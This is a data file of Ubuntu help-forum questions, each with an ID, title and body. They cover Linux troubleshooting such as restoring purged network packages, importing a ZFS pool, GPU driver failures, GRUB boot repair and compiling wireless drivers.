400644	help please with manually reinstalling some 'purged ' packages in the right order to get back my network connection	i removed packages i should n't have after using 'purge ' to remove isc-dhcpd-server , isc-dhcpd-client and isc-dhcpd-common . of the last two iá¸ż actually wondering if i should have had them removed at all ( i used isc-dhcpd to network-install wattos ( ubuntu 13.04 alternative ) on an old laptop without cd-rom or usb boot , and after having finished i wanted to remove isc-dhcpd again.. ) along with the above stuff i managed to remove the following packages according to the /var/ ... /dpkg.log file : ubuntu-minimal : i386 1.307 network-manager-gnome : i386 0.9.8.0-1ubuntu5.1 network-manager : i386 0.9.8.0-0ubuntu22 dnsmasq-base : i386 2.66-4ubuntu1 iputils-arping : i386 3:20121221-1ubuntu1 libgnome-bluetooth11 : i386 3.8.1-2ubuntu2 libnetfilter-conntrack3 : i386 1.0.3-1 libmnl0 : i386 1.0.3-3 libnm-glib-vpn1 : i386 0.9.8.0-0ubuntu22 libnm-gtk0 : i386 0.9.8.0-1ubuntu5.1 libnm-glib4 : i386 0.9.8.0-0ubuntu22 libnm-gtk-common : all 0.9.8.0-1ubuntu5.1 libnm-util2 : i386 0.9.8.0-0ubuntu22 wpasupplicant : i386 1.0-3ubuntu2.1 libreadline5 : i386 5.2+dfsg-2 can somybody maybe help me by explaining how to manually reinstall them in the right order ? i guess that if i start with the right ones ( dns , network manager , wpasupplicant ) i should have my wireless connection back up and running , so that the rest might be a bit easier to finish in the command-line . i did try to google around a bit to find a solution , but i guess my problem is rather unique . just to be clear wattos is running fine and i can use usb-sticks to get the packages on the specific pc , just the network is down due to the removed packages so i can do it with apt-get . maybe somebody can also explain me how to install the packages that i 'import ' by means of the usb-stick.. i guess pcmanfm to open the folder , than saying 'open current folder in terminal ' and then some magic with dpkg , right ?
400657	transfer files from 1 disk to another	i am trying to transfer a directory structure from a sd card to an external hard drive while preserving the integrity of the directory structure and sub folders and files within it . i need to exclude files with the file extension .123 from being transferred over as those files need to be fixed . once the remaining files with .123 extension are fixed i need to re-run a command to transfer even those files over while making sure that duplicates are not copied over and also making sure the balance of the files with the .123 extension are not transferred over until they are fixed . is there a quick way to get this done without my doing it manually ? i have over 500 folders and countless sub folders and files to transfer .
400661	what steps to follow to organize/browse files after photorec has finished	can you please recommend to me what steps to follow after photorec has created a bunch of directories like this recup_dir.1 recup_dir.2 recup_dir.3 recup_dir.4 do this folder mean anything of they are just random names ? for instance i want to have all the pictures ( png/jpeg/similar extensions ) to be on the same folder all the doc images on another and so
400663	ga-h87-hd3 and nvidia gtx760	ubuntu does n't recognise my gpu , i can see image only if i plug monitor into input on mobo ( i have integrated gpu with intel cpu also ) mobo : ga-h87-hd3 gpu : nvidia gtx760
400669	error : no default or ui configuration found	i know that this is probably a duplicate question , but since i 'm a new user , i am unable to post on the other threads . as a result , i 'm forced to create another thread . on the thread below someone suggests formatting the usb in fat 16 rather than fat 32 . this is opposite everything else i 've read ( and besides it still did n't work for me ) . boot failure : no default or ui configuration directive found ! error : no default or ui configuration found things i 've read and tried : downloading the iso several times to ensure i have a good iso trying both 13.10 and 14.04 ( both 32 & 64 ) changing isolinux files to syslinux files copying syslinux file in to the boot file note : wubi does work but only lets me partition up to 30gb and i want to have only one operating system . all with the same problem . is there a solution to this ? i have an old amd dual core 3800+ gigabyte motherboard ( ga m55sli ? ) , `` 2.9gib memory '' ( according to wubi ) there is an nvidia graphics card but i ca n't recall which one
400671	zfs : help importing a zpool after ubuntu upgrade from 13.04 to 13.10 , device ids have changed	i have updated ubuntu from version 13.04 to version 13.10 , only to discover that the sata disks ids have changed , and my zfs pool now fails . on new ubuntu 13.10 the disk ids are now ata-* instead of scsi-sata_* . this is the pool status after the update : pool : nestpool state : unavail status : one or more devices could not be used because the label is missing or invalid . there are insufficient replicas for the pool to continue functioning . action : destroy and re-create the pool from a backup source . see : http : //zfsonlinux.org/msg/zfs-8000-5e scan : none requested config : name state read write cksum nestpool unavail 0 0 0 insufficient replicas raidz2-0 unavail 0 0 0 insufficient replicas scsi-sata_wdc_wd4000f9yz-_wd-wcc1f0046946 unavail 0 0 0 scsi-sata_wdc_wd4000f9yz-_wd-wcc4a0026423 unavail 0 0 0 scsi-sata_wdc_wd4000f9yz-_wd-wmc1f0011145 unavail 0 0 0 scsi-sata_wdc_wd4000f9yz-_wd-wmc1f0049294 unavail 0 0 0 scsi-sata_wdc_wd4000f9yz-_wd-wmc1f0051143 unavail 0 0 0 scsi-sata_wdc_wd4000f9yz-_wd-wmc1f0051756 unavail 0 0 0 scsi-sata_wdc_wd4000f9yz-_wd-wmc1f0056625 unavail 0 0 0 scsi-sata_wdc_wd4000f9yz-_wd-wmc1f0200560 unavail 0 0 0 logs mirror-1 unavail 0 0 0 insufficient replicas scsi-sata_samsung_ssd_840s1atnead707062h-part2 unavail 0 0 0 scsi-sata_samsung_ssd_840s1atnead707066k-part3 unavail 0 0 0 after a very long research on the internet i started following procedure : first exported the pool using : zpool export nestpool then tried to import back the pool using : zpool import -m -f -d /dev/disk/by-id nestpool ( i have also tried with and without all combinations of -m , -f and -d , as well as usind the id instead of the zpool name ) but the import fails with the message : can not import 'nestpool ' : one or more devices is currently unavailable this is the current output of zpool import pool : nestpool id : 3947768928242827823 state : degraded status : one or more devices contains corrupted data . action : the pool can be imported despite missing or damaged devices . the fault tolerance of the pool may be compromised if imported . see : http : //zfsonlinux.org/msg/zfs-8000-4j config : nestpool degraded raidz2-0 online ata-wdc_wd4000f9yz-09n20l0_wd-wcc1f0046946 online ata-wdc_wd4000f9yz-09n20l0_wd-wcc4a0026423 online ata-wdc_wd4000f9yz-09n20l0_wd-wmc1f0011145 online ata-wdc_wd4000f9yz-09n20l0_wd-wmc1f0049294 online ata-wdc_wd4000f9yz-09n20l0_wd-wmc1f0051143 online ata-wdc_wd4000f9yz-09n20l0_wd-wmc1f0051756 online ata-wdc_wd4000f9yz-09n20l0_wd-wmc1f0056625 online ata-wdc_wd4000f9yz-09n20l0_wd-wmc1f0200560 online cache ata-samsung_ssd_840_pro_series_s1atnead707062h-part1 logs mirror-1 unavail insufficient replicas ata-samsung_ssd_840_pro_series_s1atnead707062h unavail corrupted data ata-samsung_ssd_840_pro_series_s1atnead707066k unavail log partitions were not correctly identified , they should be ata-samsung_ssd_840_pro_series_s1atnead707062h-part2 and ata-samsung_ssd_840_pro_series_s1atnead707066k-part3 . and the argument -m during import is not helping . i can not find a way to tell zpool import to use a different path/id for the log devices . any help and idea for fixing this problem will be much appreciated . what else can i do to recover this pool ? ( here is the current output of gdisk -l for all disks : http : //pastebin.com/bbec21wn )
400674	command to run keyboard shortcut ?	specifically , i 've got two instances of cgminer that open upon boot in terminal windows , i 'd like to have them automatically tiled . i also tried gdevilspie and i could n't get it to select one terminal window then the other . the ctrl + alt + numpad window tiling shortcuts work great , but what command can i use to emulate the same effect , in order to implement that into my automatic run sequence for these programs ? ?
400680	can i share my computers wifi connection ?	is there a way in xubuntu to share wifi via an ethernet cord . i used to use my laptop to connect to xbox live via my windows 7 pc , which is now unavailable due to ware and tare .
400683	slow wired internet speed ubuntu 13.10	just switched from winxp to ubuntu 13.10 and have extremely low net speed compared to what i had , ( 600kbs ) to now ( 50kbs ) . i installed all the updates . no idea what to do .
400687	how can i save the view to sort by cpu usage ?	can i somehow modify htop 's default view to display processes sorted by cpu usage ? i want htop to `` remember '' my view/sort method . if it 's relevant , i 'm currently on xubuntu 13.10 .
400688	touchpad issues with 13.10 macpro retina	i 've had ubuntu on my mac retina for a while now . initially i installed it back in a 12.x release which came with quite sophisticated touch support . it had 2 and 3 button gestures , however these were unintuative for me and i followed this guide : http : //task3.cc/1068/os-x-like-multitouch-gestures-for-macbook-pro-running-ubuntu-12-10/ # comment-27468 this enabled me to come up with some kind of hybrid between a mac and ubuntu which i was happy with . fyi - i 've been using linux for far longer than a mac , but i find mac 's touch support to be excellent and wanted something more similar . at some point my mac had dead pixels and i exchanged for a new one . for time reasons i did n't repeat the above step ... . additionally i was locked out of ubuntu for a while after a somewhat annoying mavericks update ... i 've just come back updated to 13.10 and the touchpad experience is terrible and i 'm not able to fix : i ca n't right click anywhere ... things seem sensitive , i find myself making errors which i ca n't always pinpoint that seem to relate to the touch doing things sporadically . the only gesture i can really use is two finger scrolling . the guide i was following fails on recompile telling me that it ca n't find glx , i use my machine for 3d graphics and know this is working elsewhere . i feel like touch support should be pretty good by now with the push in to mobile in 14.x . am i missing something ? thanks dan
400691	macbook pro retina refit problem after mavericks update	i have a problem that others do seem to have had , but have had not success following their suggestions . updating to the mavericks added another partition which put refit/grub out of sync and dumps me at the grub recovery shell : typing `` set '' , returns : root= ( hd0 , gpt5 ) prefix= ( hd0 , gpt5 ) /boot/grub for which the fix is ( noting the increment in partition number ) : set root= ( hd0 , gpt6 ) set prefix= ( hd0 , gpt6 ) /boot/grub insmod normal normal i 've tried updating and reinstalling grub , to no avail . i do n't really understand the relationship between grub and refit . does refit have some kind of snapshot of grub that needs updating ? thanks dan
400694	xubuntu 13.10 icon to permanently install does n't work	i booted from usb and xubuntu opens on what i presume is a desktop run directly from the usb . there is an icon on the desktop that says click to install permanently . i would like to install xubuntu on the hard drive and wipe out windows , but the icon is n't clickable and i do n't get any options otherwise . what do i do ? !
400695	x-star dp2710 monitors not recognized	i recently purchased two korean ips monitors , however , on plugging them in , all i was able to see was a flashing coloured screen , i 've read elsewhere that this is related to edid : $ dmesg | grep edid [ 2.700416 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 128 after some shinanigans , i switched to the nouveau drivers using the following instructions : sudo nvidia-settings -- uninstall sudo apt-get remove -- purge nvidia* sudo apt-get remove -- purge xserver-xorg-video-nouveau xserver-xorg-video-nv sudo apt-get install nvidia-common sudo apt-get install xserver-xorg-video-nouveau sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo dpkg-reconfigure xserver-xorg source : ubuntu wiki they both work flawlessly for about ten minutes up to about 39 minutes so far ( and let me tell you how glorious 5120x1440 is ... ) but once that ten minutes is up : they both get covered in squares of colour almost like pixelation , or ; my system freezes entirely to the point that all i can do is reisub ( gpu lockup - switching to fbcom is what i saw once when it responded to ctrl + alt + f1 one time ) . syslog jan 8 12:04:31 monster kernel : [ 6384.233289 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] trap ch 4 [ 0x027f99f000 compiz [ 2422 ] ] jan 8 12:04:31 monster kernel : [ 6384.233298 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] gpc1/tpc0/tex : 0x80000049 jan 8 12:04:31 monster kernel : [ 6384.233302 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] gpc1/tpc1/tex : 0x80000049 jan 8 12:04:31 monster kernel : [ 6384.233308 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] gpc2/tpc0/tex : 0x80000049 jan 8 12:04:31 monster kernel : [ 6384.233312 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] gpc2/tpc1/tex : 0x80000049 jan 8 12:04:31 monster kernel : [ 6384.233330 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] pfifo : read fault at 0x0018ad9000 [ page_not_present ] from ( unknown enum 0x00000000 ) /gpc2/ ( unknown enum 0x00000004 ) on channel $ jan 8 12:04:38 monster kernel : [ 6390.861216 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] trap ch 4 [ 0x027f99f000 compiz [ 2422 ] ] jan 8 12:04:38 monster kernel : [ 6390.861222 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] rop0 0x80000000 0x80000001 jan 8 12:04:38 monster kernel : [ 6390.861226 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] rop1 0x80000000 0x80000001 jan 8 12:04:38 monster kernel : [ 6390.861230 ] nouveau e [ pgraph ] [ 0000:01:00.0 ] rop2 0x80000000 0x80000001 jan 8 12:04:44 monster kernel : [ 6396.660693 ] sysrq : this sysrq operation is disabled . jan 8 12:04:45 monster kernel : [ 6397.660695 ] sysrq : this sysrq operation is disabled . jan 8 12:04:46 monster kernel : [ 6398.724695 ] sysrq : emergency sync jan 8 12:04:46 monster kernel : [ 6398.750943 ] emergency sync complete jan 8 12:04:46 monster kernel : [ 6399.156691 ] sysrq : emergency remount r/o in an attempt to fix this issue , i 've tried installing 304,319 proprietary drivers . however , when i install the proprietary drivers i get a black screen on load and a direct reduction to 640x480 with only one screen functional . this presents another problem . typically , the following would work to reset unity : dconf reset -f /org/compiz/ unity -- reset-icons & disown however , this fails saying that `` glxqueryextension string is null for screen 0 '' . so , when this happened , i figured maybe i need to go and set things up in nvidia-settings . so , i try opening nvidia-settings but it tells me : you do not appear to be using a nvidia x driver you should run nvidia xconfig so i try running sudo nvidia-xconfig , nothing happens and here i am . i 've been reading elsewhere and i believe i may need to write a custom xorg.conf file for these monitors . but i have no idea how to do that . system specs : i built this pc from scratch so i have detailed information about every part i used : http : //ca.pcpartpicker.com/p/qbh8 i7-3930k 32gb ram 250gb ssd evga gtx 660 2 x x-star dp2710 2560x1440 monsters.. i mean monitors . help me get back to this , permanently and win a lifetime of good karma : research : blank monitor , flicker , snow , or other random live image corruption if you use dual-head ( two video outputs in use ) or dual-link ( a very high resolution monitor ) , and the vbios has too low clocks by default , the video memory bandwitdh will be insufficient for scanout . this can lead to a blank image , or live image corruption , that changes on every vertical refresh , and likely does not show up in screencaptures . for the monitor , this is not a case of an unsupported video mode but random video data . raising the card performance mode might help . ask on irc , # nouveau channel , how to do that . instructions are not given here , because in the worst case , it may destroy your card , because power management is still a work in progress . source : http : //nouveau.freedesktop.org/wiki/troubleshooting/ related bugs : https : //bugs.freedesktop.org/show_bug.cgi ? id=72180
400696	can not select ubuntu 13.10 to boot up alongside windows 7	i just installed my ubuntu 13.10 on ext4 partition , and no i have no choice to boot up using it . the laptop automatically boots up using windows 7 . any suggestions enter code here .
400697	why ca n't i log in on unity ?	i 'm using ubuntu 13.04 with unity . whenever i log in into my computer , the screen becomes black , then purple ( that dark ubuntu-color ) and that switches a few times . between that the screen shortly shows a nvidia-logo . then it switches back to the login-screen . what is wrong with my pc ? what can i do ? i hope you could help me ... ps : sorry for my bad english , i 'm no native speaker .
400699	ubuntu error , weird windows and duplicated cursor	my ubuntu show error after login and the windows are weird ( looks like old-style windows ) also my cursor is duplicate . http : //i.imgur.com/8gv9i5q.png gpu nvidia gtx760 i have image only on x-server xorg driver
400700	is there a fast way to add album cover art to 199 different albums	i want to add cover art to my songs , but i have 763 songs , 110 artists , and 199 albums . right now i can add cover art using easytag , but this could take weeks . is there any way to do this faster . there are tons of apps for ubuntu , would n't there be one that gets the cover art and embed it in the mp3 for you ?
400703	problems installing virtual box guest additions on ubuntu ( host ) and windows7 ( guest )	i am an absolute newbie to linux and was trying to share a folder between my ubuntu 13.10 ( host ) and windows 7 64 bit ( guest ) . i followed the procedure outlined below : http : //www.dedoimedo.com/computers/virtualbox-guest-addons.html my problem is that i am not getting the menu options ( machine , devices , help ) as shown in one of the screenshots in the above link . i am assuming that i ca n't access a shared folder unless i install vbguestadditions . i checked other questions asked by fellow askubuntuites but most of them followed the same procedure as described in the link above . any help in this regard would be greatly appreciated . tia .
400706	my gear icon thing up in the top right corner has turned red.. why ?	the gear icon on the top right has turned red . why ?
400708	lubuntu 13.10 wine issues	i have successfully installed wine to my laptop ( it 's a dinosaur from 2006 with 1 gig of ram ) , and although i only use it because i am so poor that i ca n't afford a new laptop , i have a very interesting problem whenever i try to use wine to do anything except the default of running notepad.exe which comes with wine : everytime i try to run firefox.exe , wine fails to execute it , i get an error message like this : so as you can see , it 's really difficult to troubleshoot this sort of problem ( granted i am a noob and basically do n't know what i am doing ) , so i am not sure if it 's a lubuntu issue or if it 's a firefox issue . i do know , however , that i can run the firefox that comes with lubuntu as the default web browser , which you 'll see in the picture i am using to post this question . thoughts , ideas , comments -- anything is appreciated .
400710	installing wlan driver	after 6 hours i 've come close to give up on ubuntu . i installed ubuntu 12.04 on my desktop computer , but my wlan wo n't work . right now i 've connected the computer with an ethernet cable . ( the lady of the house hates that cable ) . i have an asus pce-n53 , which is compatible with linux , i downloaded the driver but there is no executable file in the folder . only a makefile . keep in mind i 've had ubuntu for 6 hours , i have no idea what i 'm doing here . after some help on ubuntu norway 's facebook page , i tried this : espen @ ubuntu : ~ $ cd /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326 espen @ ubuntu : ~/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326 $ make make -c tools make [ 1 ] : entering directory `/home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/tools' gcc -g bin2h.c -o bin2h make [ 1 ] : leaving directory `/home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/tools' /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/tools/bin2h cp -f os/linux/makefile.6 /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/makefile make -c /lib/modules/3.8.0-29-generic/build subdirs=/home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-29-generic' cc [ m ] /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../common/rtmp_mcu.o /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../common/rtmp_mcu.c : in function ‘rtmpasicsendcommandtomcu’ : /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../common/rtmp_mcu.c:558:4 : warning : passing argument 3 of ‘pci_read_config_word’ from incompatible pointer type [ enabled by default ] include/linux/pci.h:794:19 : note : expected ‘u16 *’ but argument is of type ‘ulong *’ /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../common/rtmp_mcu.c:564:4 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../common/rtmp_mcu.c:564:4 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../common/rtmp_mcu.c:578:4 : warning : passing argument 3 of ‘pci_read_config_word’ from incompatible pointer type [ enabled by default ] include/linux/pci.h:794:19 : note : expected ‘u16 *’ but argument is of type ‘ulong *’ /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../common/rtmp_mcu.c:587:4 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../common/rtmp_mcu.c:587:4 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 3 has type ‘ulong’ [ -wformat ] cc [ m ] /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.o /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:42:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_remove_one’ /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:43:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_probe’ /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:62:46 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘__devinitdata’ /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:87:17 : error : ‘rt2860_pci_tbl’ undeclared here ( not in a function ) /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:88:17 : error : ‘rt2860_probe’ undeclared here ( not in a function ) /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:90:5 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function-declaration ] /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:90:29 : error : ‘rt2860_remove_one’ undeclared here ( not in a function ) /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:294:24 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_probe’ /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:465:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_remove_one’ /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.c:73:1 : error : ‘__mod_pci_device_table’ aliased to undefined symbol ‘rt2860_pci_tbl’ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux/../../os/linux/pci_main_dev.o ] error 1 make [ 1 ] : *** [ _module_/home/espen/nedlastinger/linux/dpo_gpl_rt5592sta_linuxsta_v2.6.0.0_20120326/os/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-29-generic' make : *** [ linux ] error 2 as you can see it did not work . of course i 've tried the additional drivers program , it only had drivers for my nvidia card , nothing else . anyone out there have any suggestions ? i was told to ./configure.. i have no idea what that means !
400711	backing up data from previous ubuntu installation - unable to access home directory	due to a problem with my ubuntu 13.10 ( apparently it 's incompatible with my graphics card as i explained here ) , i decided that i will install the lts 12.04 version instead.. so i prepared a bootable usb now and ready to install . but first , i want to backup my data from the old installation , i had files in the home directory that i would like to keep . so when i booted from the usb stick , i chose `` try ubuntu '' to try to access my old files and back them up . so from nautilus i found the drive that contains my old installation , went through home - > myusername but then i get the following message : the folder contents could not be displayed - you do not have the permissions necessary to view the contents of myusername makes sense , because i had a password there , now how can i access this folder ? i tried launching nautilus as sudo , now i can open myusername directory to find two files : readme.txt and access-your-private-data.desktop , when i try to open the later i see an error message saying untrusted application launcher - the application launcher `` access-your-private-data.desktop '' has not been marked as trusted . if you do not know the source of this file , launching it may be unsafe . i can not find a way to get past this error message , i can only hit `` cancel ''
400713	12.04 ridiculous boot up sequence not a duplicate	alas , it is true that the question itself is a duplicate but the answers in the other places did not work for me . so i will try again with updated info . here is what is happening at boot . 1 . think pad screen ( normal ) 2 . gnu grub screen with three choices : first one ubuntu something ( i ca n't read my own notes ! ) , second one is recovery , third one is previous ubuntu version ( not normal screen ) . i go with the first one . btw this screen started showing up with a debian earth background ( new and not normal ) . 3 . normal boot up screen black background white ubuntu letters . 4 . running in low graphics mode ( not normal ) . i say yes run once in low graphics . 5 . older ubuntu version login screen shows up . i set dropdown to ubuntu and i get my normal ubuntu desktop back ! wow ! but there are some system problems , instability , nautilus crashes , etc . what do you recommend to get back to the normal boot up sequence:1 . think pad screen . 2 . ubuntu black background , white letters . 3 . normal 12.04 ubuntu desktop ?
400715	trouble with user authorizations	i may have shot myself in the foot , but here is what i have going . my father has alzheimers , and i 've set up a d/t with ubuntu 12.04 for him . the trouble is , i have his account set up with no password , and the guest account needs to be disabled , but i also have an admin account that i have disabled . so now , the user accounts can not be modified , as no password is set up for the one active admin account . i have the bsd user man pages in hardcopy , and i can find no way to delete users , only to add them . on another box in 13.04 , i have displayed the /etc/passwd file , but that system does not have a problem . the system in question technically has no password on the root account , but user authentication fails when anything or nothing is entered for the password .
400718	how to install the nvidia driver on a notebook ?	i have used ubuntu and debian on my desktop for a long time . there i do n't have an onboard graphic card but i 'm on a notebook now and i have an 'intel hd graphics 4600 ' on my motherboard . my ubuntu is n't recognizing my nvidia gt 740m and i ca n't use 'additional drivers ' to install anything . how can i get my graphic card to work ? thanks
400722	i 'd like some help installing and running minecraft on lubuntu 13.10	so , just today i installed lubuntu 13.10 on my piece-of-crap laptop and i absolutely love how fast it is . i installed java 7 successfully , and i downloaded the minecraft.jar ( minecraft fo linux/other ) files at https : //www.minecraft.net/download . the first thing i did was drag the minecraft.jar to my desktop . i then right-clicked it , went to properties , made sure it was marked as executable , and then selected `` open with ... '' but i did n't find java 7 runtime environment nor anything java-related . i then tried running it via terminal ( i forgot the command but i believe it went along the lines of `` java -jar minecraft.jar '' ) . i also tried using `` sudo chmod a+x minecraft.jar '' to ensure that it was indeed executable . yet none of this worked . any help is appreciated . thanks ! ^-^ -- -- -- -- -- -- -- -- -- -- devon -edit- should i just switch to a distribution that i know can run minecraft ?
400723	installing matlab	hello i 've been trying to install matlab 2012a on my device i followed the manual but i got stuck when the installer wanted to install the files in /usr/local/ it failed to creat a path called /usr/local/matlab/2012a . i think the problem is in permissions so i want to know how can i give the installer the permission to create and install files in this directory or other directories ? thanks in advance
400725	after logging in , screen goes blank and then gets distorted ?	i used unetbootin to install ubuntu 13.10 onto an hp m8100n pc . it installed perfectly then asked me to reboot to start using it . i reboot the pc and logged in , but once i had logged in , the screen went blank ... then showed up distorted . this is the first time i 've tried linux overall so , i do n't know much about 'tinkering ' ... i tried to see if opening terminal would work but it did n't .
400731	changing choice of folders in download dialog ?	i 'm using ubuntu 13.10 when i download a file ( say e.g. , in firefox ) , there is a list of `` shortcut folders '' on the left ( e.g . documents , music , pictures , videos , downloads [ [ i would have added image , but the forum wo n't let me ] ] ) . is it possible to change this list ? in particular , earlier versions used to have `` ubuntu one '' as an additional option in this list , which is now missing . i 'd like to add that back if possible . adding `` dropbox '' would be helpful as well . thanks ! v
400733	turn off monitor only after locking screen	i see there is no setting to turn the monitor off after the screen is locked unlike the one for screen locking which can be set to act after the monitor has been turned off . i do not want the system to automatically lock the screen however , so i only want it the screen to turn off after some time after the screen has been manually locked . is there a way to automatically turn the monitor off after the screen has automatically locked ?
400737	ubuntu 12.10 and ati 3650	first of all sorry about my bad english i try to install a video-driver for 3650 on ubuntu 12.10 i dangered the xorg and install a legacy driver , but after installation i have a two errors in log error : kernel includes at /lib/modules/3.5.0-44-generic/build/include do not match current kernel . they are versioned as `` '' instead of `` 3.5.0-44-generic '' . you might need to adjust your symlinks : - /usr/include - /usr/src/linux [ error ] kernel module : failed to compile kernel module - please consult readme . [ reboot ] kernel module : update-initramfs pleas help me .
400747	wireless duo issue	i 've borrowed a qualcomm atheros ar5212/ar5213 external wireless card to use on long distances with external antenna , since my native broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( b43 driver ) on hp compaq 6715b ( ubuntu 12.04 ) does n't do it . ubuntu did n't have problems recognizing it and loaded ath5k driver , that has inefficient injection and fragmentation implementation . i 've patched it as on http : //wiki.backbox.org/index.php/compat-drivers_aircrack_patched , after which broadcom adapter stopped working . laptop wireless button now reacts on qualcomm adapter strictly . i 've uninstalled and reinstalled b43 , checked -it 's not blacklisted ( wl and bcm43xx are ) , updated initramfs image , echo b43 > > /etc/modules . but when i try to load it : modprobe b43 fatal : error inserting b43 ( /lib/modules/3.8.0-35-generic/kernel/drivers/net/wireless/b43/b43.ko ) : invalid argument hardware detects perfectly , but assigns no interface to adapter . on boot built-in wireless indicator flashes , but then disappears at on lightdm load . all that whilst wlan1 ( qualcomm ) functions , and if i unplug it , no wireless interface loads at all . neither uninstalling backport drivers , nor installing older version did help . i 'm desperate . please , help .
400754	best version for netbook	i have gateway lt4010u with intel atom n2600 igb ddr3 memory and 320 gb hdd witch version would be the best ... i am thinking of puppy but i have used ubuntu before and would like to choose a version from here is there any suggestiolns
400756	how to re-enable grub when installed ubuntu system wo n't boot ?	i had windows vista and ubuntu 12.04 lts dual booting on my lenovo sl300 laptop . i used a windows 7 home premium install disk to install 7 on a new partition . then i uninstalled vista by deleting the windows vista partition . now when i boot the computer it goes straight into windows 7 without displaying the grub bootloader . the ubuntu partition is still untouched and i would like to be able to acess it without reinstalling ubuntu . do i someohow need to confiure grub through windows ? i still have my 12.04 lts live disk , so i could maybe use that to access the grub files that are on my ubuntu partition ? please help
400757	i need to compile backprots-20131206 into ath10k device driver	i need to compile source code backports-20131206 into wireless ap device driver as ath10k i used make clean make defconfig-ath10k make but i found there are no ath.ko mac80211.ko ath9k.ko ath10k_core.ko rt2x00lib.ko rt2x00mmio.ko rt2x00pci.ko rt2800lib.ko rt2800pci.ko these are device driver for ath10k , how & where can i use the source code to compile into ath10k for these device driver for wireless ap . thanks
